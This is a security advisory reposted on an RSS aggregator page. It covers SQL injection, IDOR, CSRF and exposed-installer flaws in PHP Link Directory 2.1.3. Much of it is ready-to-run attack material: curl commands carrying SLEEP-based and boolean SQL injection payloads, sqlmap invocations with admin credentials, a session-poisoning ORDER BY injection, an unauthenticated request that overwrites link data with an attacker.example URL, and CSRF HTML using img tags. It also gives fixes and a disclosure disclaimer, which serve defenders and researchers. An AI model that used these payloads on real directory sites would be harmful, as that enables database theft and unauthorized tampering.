惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Recorded Future
Recorded Future
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
T
Troy Hunt's Blog
S
Security Archives - TechRepublic
S
Security @ Cisco Blogs
AI
AI
Schneier on Security
Schneier on Security
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
C
CERT Recently Published Vulnerability Notes
Spread Privacy
Spread Privacy
Help Net Security
Help Net Security
L
Lohrmann on Cybersecurity
The Hacker News
The Hacker News
Google DeepMind News
Google DeepMind News
www.infosecurity-magazine.com
www.infosecurity-magazine.com
Security Latest
Security Latest
T
Tor Project blog
P
Privacy International News Feed
The Last Watchdog
The Last Watchdog
L
LINUX DO - 最新话题
D
DataBreaches.Net
W
WeLiveSecurity
H
Help Net Security
L
LangChain Blog
B
Blog RSS Feed
Scott Helme
Scott Helme
Hacker News: Ask HN
Hacker News: Ask HN
C
Cisco Blogs
Cloudbric
Cloudbric
Application and Cybersecurity Blog
Application and Cybersecurity Blog
O
OpenAI News
I
InfoQ
GbyAI
GbyAI
Project Zero
Project Zero
Blog — PlanetScale
Blog — PlanetScale
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
WordPress大学
WordPress大学
Stack Overflow Blog
Stack Overflow Blog
G
GRAHAM CLULEY
T
The Blog of Author Tim Ferriss
酷 壳 – CoolShell
酷 壳 – CoolShell
Jina AI
Jina AI
H
Hackread – Cybersecurity News, Data Breaches, AI and More
博客园 - 聂微东
美团技术团队
PCI Perspectives
PCI Perspectives
Y
Y Combinator Blog
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC

CXSECURITY Database RSS Feed - CXSecurity.com

Windows Defender (MsMpEng.exe) Race Condition -> LPE / SYSTEM / Use-After-Free -> Crash D-Link DSL2600U rom-0 Admin Password Disclosure KNX visualisering - Broken Access Control OpenEMR 7.0.2 Arbitrary File Read ZTE ZXHN H188A V6 Authentication Bypass phpLD 2.1.3 (EOL) has authenticated SQLi in admin/dir_validate.php (CATEGORY_ID) and admin ORDER BY (sort), unauthenticated IDOR in add_reciprocal.php, CSRF on admin link actions via GET, and exposed install/ after deployment. Verified locally on v2.1.3. Tenable Terrascan Server <= v1.18.3 SSRF and Local File Read Lenovo LegionSpace 1.7.11.2 DAService Unquoted Service Path ZTE H298A / H108N Unauthenticated Credential Exposure WordPress Contest Gallery 28.1.4 Unauthenticated Blind SQL Injection BrandIT Consultancy - Blind Sql Injection Association Management Script - Multiple Vulnerabilities (IDOR, SQLi, Stored XSS) Canvas Breach: Symbiotic Dual-Virus Model & Origin Parity Evidence Open ISES Tickets < 3.44.2 - Hardcoded MySQL Credentials ePati Antikor NGFW 2.0.1301 Authentication Bypass Windows Shell LNK Spoofing to NTLMv2 Hash Capture Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service Grav CMS 2.0.0-beta.2 Remote Code Execution Frigate NVR 0.16.3 Remote Code Execution Linux nf_tables 6.19.3 Local Privilege Escalation ThingsBoard IoT Platform 4.2.0 Server-Side Request Forgery (SSRF) Linux Kernel Local Privilege Escalation (CVE-2026-43284 / CVE-2026-43500 / CVE-2026-46300) SUSE Manager 4.3.15 Code Execution Apache HertzBeat 1.8.0 Remote Code Execution JuzaWeb CMS 3.4.2 Authenticated Remote Code Execution NiceGUI 3.6.1 Path Traversal - CXSecurity.com GUnet OpenEclass E-learning platform < 4.2 Remote Code Execution (RCE) Windows Snipping Tool NTLMv2 Hash Hijack telnetd 2.7 Buffer Overflow - CXSecurity.com Kukurigu LPE - Linux Kernel Privilege Escalation (CVE-2026-43284 / CVE-2026-43500) Event Booking Calendar-5.0 Cross-site scripting (reflected) Linux Kernel Local Privilege Escalation (CVE-2026-43284 / CVE-2026-43500) Ninja Forms Uploads Unauthenticated PHP File Upload Traccar GPS Tracking System 6.11.1 Cross-Site WebSocket Hijacking (CSWSH) Erugo 0.2.14 Remote Code Execution (RCE) Linux Kernel Local Privilege Escalation via Memory Handling and Access Control Weakness Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) Linux Kernel proc_readdir_de() 6.18-rc5 Local Privilege Escalation Insecure Permissions vulnerability in Nagios Network Analyzer v.2024R1.02-64 and before allows a local attacker to escalate privileges via the remove_source.sh component. Samsung ONE Integer Overflow in CircleConst Tensor Size Calculation solaredge-CSRF-OOB-Injection - CXSecurity.com Trojan-Spy.Win32.Small / Remote Command Execution OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Throttlestop Kernel Driver Kernel Out-of-Bounds Write Privilege Escalation Critical Remote Code Execution Vulnerability in Windows Internet Key Exchange (IKE) Service (CVE-2026-33824) WordPress Madara Local File Inclusion FortiWeb 8.0.2 Remote Code Execution Easy File Sharing Web Server v7.2 Buffer Overflow NetBT e-Fatura Privilege Escalation - CXSecurity.com Docker Desktop 4.44.3 Unauthenticated API Exposure MaNGOSWebV4 4.0.6 Reflected XSS - CXSecurity.com Grafana 11.6.0 SSRF - CXSecurity.com OctoPrint 1.11.2 File Upload - CXSecurity.com esm-dev 136 Path Traversal - CXSecurity.com Linux Kernel mseal Invariant Violation (Linux kernel 6.17-7.0 rc5) astrojs/vercel <= 10.0.0 - Unauthenticated x-astro-path Header Path Override Microsoft SQL Server Privilege Elevation Through FreeScout Unauthenticated RCE via ZWSP .htaccess Bypass Wavlink WL-WN579X3-C firewall.cgi UPNP Stack-based Buffer Overflow esiclivre 0.2.2 SQL Injection - CXSecurity.com Payara Server Cross Site Scripting esiclivre 0.2.2 SQL Injection - CXSecurity.com SiYuan <= v3.6.1 Note unauthenticated arbitrary file read (path traversal) Tenda AC21 V1.0 V16.03.08.16 - Stack Buffer Overflow in SetNetControlList WWBN AVideo <= 26.0 - Authenticated SQL Injection Windows RRAS Remote Code Execution Vulnerability (CVE-2026-26111) - SE-RCE Exploit Linux Kernel 5.8 < 5.15.25 - Local Privilege Escalation Exploit Discourse <= 2026.2.1 Authenticated Missing Authorization Kanboard <= 1.2.50 Authenticated SQL Injection Glances <= 4.5.2 OS Command Injection via Mustache Template Fields LB-LINK BL-WR9000 V2.4.9 - Stack-based Buffer Overflow in /goform/get_hidessid_cfg LB-LINK BL-WR9000 V2.4.9 - Unauthenticated / Post-Auth Stack-based Buffer Overflow zumba/json-serializer zumba/json-serializer < 3.2.3 RCE Wekan 8.31.0 - 8.33Meteor DDP notificationUsers Sensitive Data Leak Splunk Remote Command Execution via Improper Input Validation Microsoft Windows MSHTML Security Feature Bypass Vulnerability Qualcomm GPU Driver Memory Corruption Vulnerability in Android Devices Frappe Framework <14.99.0 and <15.84.0 Unauthenticated SQL Injection PyJWT < 2.12.0 crit header bypass / Insufficient crit validation PluckCMS 4.7.10 Unrestricted File Upload Python-Multipart <0.0.22 - Path Traversal / Arbitrary File Write (CVE-2026-24486) WeGIA <= 3.6.4 Unauthenticated Admin Authentication Bypass NocoDB <= 0.301.2 User Enumeration via Password Reset Endpoint Craft CMS 4.x & 5.x RCE via Blocklist Bypass pac4j-jwt < 4.5.9, < 5.7.9, < 6.3.3 JwtAuthenticator Authentication Bypass via JWE-wrapped PlainJWT AirPlay Dual‑Mode Discovery Scanner for Flipper Zero ESP32 WiFi Dev Board WeGIA <= 3.6.4 Remote Code Execution via OS Command Injection WordPress Backup Migration 1.3.7 Remote Command Execution WeGIA 3.5.0 SQL Injection - CXSecurity.com
PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF
Xasthur · 2026-06-15 · via CXSECURITY Database RSS Feed - CXSecurity.com

PHP Link Directory (phpLD) 2.1.3 - SQL Injection, IDOR, CSRF

Title: PHP Link Directory (phpLD) 2.1.x Multiple Vulnerabilities Product: PHP Link Directory (phpLD) Vendor: NetCreated, Inc. / phplinkdirectory.com (EOL) Version: 2.1.3 (also affects 2.1.x branch; tested on 2.1.3) Type: SQL Injection, IDOR, CSRF, Information Disclosure Risk: High (authenticated SQLi) / Medium (unauthenticated IDOR) Discovered: 2026-06-14 Advisory: PHPLD-2026-001 ================================================================================ SUMMARY ================================================================================ PHP Link Directory 2.1.3 contains several security issues: [1] SQL Injection in admin/dir_validate.php (POST CATEGORY_ID) [2] SQL Injection in admin panel via ORDER BY (GET sort -> session) [3] Insecure Direct Object Reference in add_reciprocal.php (no auth) [4] CSRF on admin state-changing GET actions (dir_links_edit.php) [5] Exposed install/ directory after deployment (configuration risk) Public-facing search (index.php?q=) and submit.php CAPTCHA are NOT SQL injectable in default code (parameters are escaped). Do not report those as SQLi without a separate bypass. ================================================================================ TEST ENVIRONMENT (local PoC only) ================================================================================ Software : phpLD 2.1.3 PHP : 5.x / 7.x (legacy code) DBMS : MySQL / MariaDB URL : http://127.0.0.1/phpld/ <-- change to your local path Prerequisites: - Completed /install/ setup - At least one admin user - At least one active link (STATUS=2) for IDOR test - At least one link in a category for dir_validate test ================================================================================ [1] SQL INJECTION - admin/dir_validate.php (CATEGORY_ID) ================================================================================ File : admin/dir_validate.php (line ~122) Auth : Required (admin or editor session) Method : POST Param : CATEGORY_ID Vulnerable code: if ($_REQUEST['CATEGORY_ID'] > 0) { $where = " WHERE CATEGORY_ID = '".$_REQUEST['CATEGORY_ID']."'"; } $rs = $db->Execute("SELECT ... FROM PLD_LINK {$where}"); CATEGORY_ID is concatenated into SQL without escaping. --- PoC: Time-based blind (manual curl) --- Step 1 - Authenticate and save session cookie: curl -c cookies.txt -X POST \ "http://127.0.0.1/phpld/admin/login.php" \ -d "user=admin&pass=admin&submit=Login" -L Step 2 - Trigger SLEEP (expect ~5 second delay): curl -b cookies.txt -X POST \ "http://127.0.0.1/phpld/admin/dir_validate.php" \ -d "submit=Start&VALIDATE_LINKS=1&VALIDATE_RECPR=0&CATEGORY_ID=1'+AND+SLEEP(5)--+-" Step 3 - Boolean comparison (all links vs none): CATEGORY_ID=1' OR '1'='1 CATEGORY_ID=1' AND '1'='2 --- PoC: sqlmap --- sqlmap -u "http://127.0.0.1/phpld/admin/dir_validate.php" \ --auth-url="http://127.0.0.1/phpld/admin/login.php" \ --auth-data="user=admin&pass=admin&submit=Login" \ --auth-type=POST \ --data="submit=Start&VALIDATE_LINKS=1&VALIDATE_RECPR=0&CATEGORY_ID=1" \ -p CATEGORY_ID \ --dbms=mysql --prefix="1'" --suffix="-- -" \ --batch --random-agent --time-sec=5 Impact: Full database read/write as DB user (admin credentials dump, link/category tampering). Fix: Use $db->qstr($_REQUEST['CATEGORY_ID']) or intval() whitelist. ================================================================================ [2] SQL INJECTION - admin ORDER BY (sort parameter) ================================================================================ File : admin/init.php (line ~216), used by multiple admin/*.php Auth : Required Method : GET (stored in session, injected on next page load) Param : sort Vulnerable flow: $_SESSION['sort'][SCRIPT_NAME]['field'] = $_REQUEST['sort']; ... $orderBy = ' ORDER BY '. SORT_FIELD.' '.SORT_ORDER; Affected examples: admin/conf_users.php admin/conf_payment.php admin/email_message.php admin/email_sent_view.php --- PoC: Two-step ORDER BY time-based (MySQL) --- Step 1 - Login (see above), save cookies.txt Step 2 - Poison session via sort parameter: curl -b cookies.txt \ "http://127.0.0.1/phpld/admin/conf_users.php?sort=LOGIN,(SELECT+*+FROM+(SELECT+SLEEP(5))a)" Step 3 - Load page to execute ORDER BY: curl -b cookies.txt \ "http://127.0.0.1/phpld/admin/conf_users.php" (Expect ~5s response on step 3 if injectable.) --- PoC: sqlmap (may require session handling) --- curl -b cookies.txt \ "http://127.0.0.1/phpld/admin/conf_users.php?sort=LOGIN" sqlmap -u "http://127.0.0.1/phpld/admin/conf_users.php" \ --load-cookies=cookies.txt \ -p sort --technique=T --dbms=mysql --batch Fix: Whitelist allowed column names before storing in session. ================================================================================ [3] IDOR - add_reciprocal.php (unauthenticated link update) ================================================================================ File : add_reciprocal.php (line ~71-94) Auth : NOT required Method : GET + POST Param : id, RECPR_URL Any user who knows/guesses a valid link ID with empty RECPR_URL can update that link record without proving ownership. Vulnerable code: if ($data = $db->GetRow("SELECT * FROM PLD_LINK WHERE ID = ".$db->qstr($id))) { $data['RECPR_URL'] = $_REQUEST['RECPR_URL']; ... $db->Replace($tables['link']['name'], $data, 'ID', true); } --- PoC: Unauthenticated reciprocal link overwrite --- Replace LINK_ID with an existing link ID where RECPR_URL IS NULL. # Verify form is shown (link exists, recpr empty): curl -s "http://127.0.0.1/phpld/add_reciprocal.php?id=LINK_ID" | \ grep -i "Reciprocal Link URL" # Overwrite reciprocal URL (no cookie, no login): curl -X POST "http://127.0.0.1/phpld/add_reciprocal.php?id=LINK_ID" \ -d "RECPR_URL=http://attacker.example/reciprocal.html&submit=Add" # Verify in DB: SELECT ID, URL, RECPR_URL FROM PLD_LINK WHERE ID=LINK_ID; Impact: Unauthorized modification of directory link metadata; SEO / reciprocal-link integrity compromise. Fix: Require signed token or owner email verification; bind update to submitter session/secret. ================================================================================ [4] CSRF - admin link management via GET ================================================================================ File : admin/dir_links_edit.php Auth : Admin session (victim must be logged in) Method : GET Param : action Examples (victim admin must visit attacker page while logged in): /admin/dir_links_edit.php?action=D:123 (delete link 123) /admin/dir_links_edit.php?action=A:123 (approve link 123) /admin/dir_links_edit.php?action=S:123:2 (set status) PoC HTML (host on attacker server, victim opens while admin): <html><body> <img src="http://127.0.0.1/phpld/admin/dir_links_edit.php?action=D=1" /> <img src="http://127.0.0.1/phpld/admin/dir_links_edit.php?action=A:1" /> </body></html> Note: Use action format with colon: action=A:1 not action=D=1 Fix: CSRF tokens; use POST for state changes; SameSite cookies. ================================================================================ [5] INFORMATION DISCLOSURE - install/ left accessible ================================================================================ If install/ is not removed after setup, installer remains reachable and may allow database reconfiguration depending on server state. PoC: curl -I "http://127.0.0.1/phpld/install/index.php" Expected after install: 404 or 403. If 200 OK -> misconfiguration. Fix: Delete install/ directory after installation. ================================================================================ REMEDIATION (vendor / administrator) ================================================================================ 1. Remove install/ after setup 2. Patch dir_validate.php - escape CATEGORY_ID 3. Whitelist sort columns in admin/init.php 4. Add CSRF tokens to all admin mutating actions 5. Add ownership check to add_reciprocal.php 6. Upgrade to supported software; phpLD 2.1.x is end-of-life 7. Do not expose admin panel to internet without IP restriction / 2FA ================================================================================ TIMELINE ================================================================================ 2026-06-14 Discovery and local verification 2026-xx-xx Vendor notification (if applicable) 2026-xx-xx Public disclosure ================================================================================ CREDIT ================================================================================ Researcher: [Xasthur] Reference: PHPLD-2026-001 ================================================================================ LEGAL ================================================================================ PoC is intended for authorized local testing and responsible disclosure only. Unauthorized access to systems you do not own is illegal. ================================================================================



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Copyright 2026, cxsecurity.com

此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。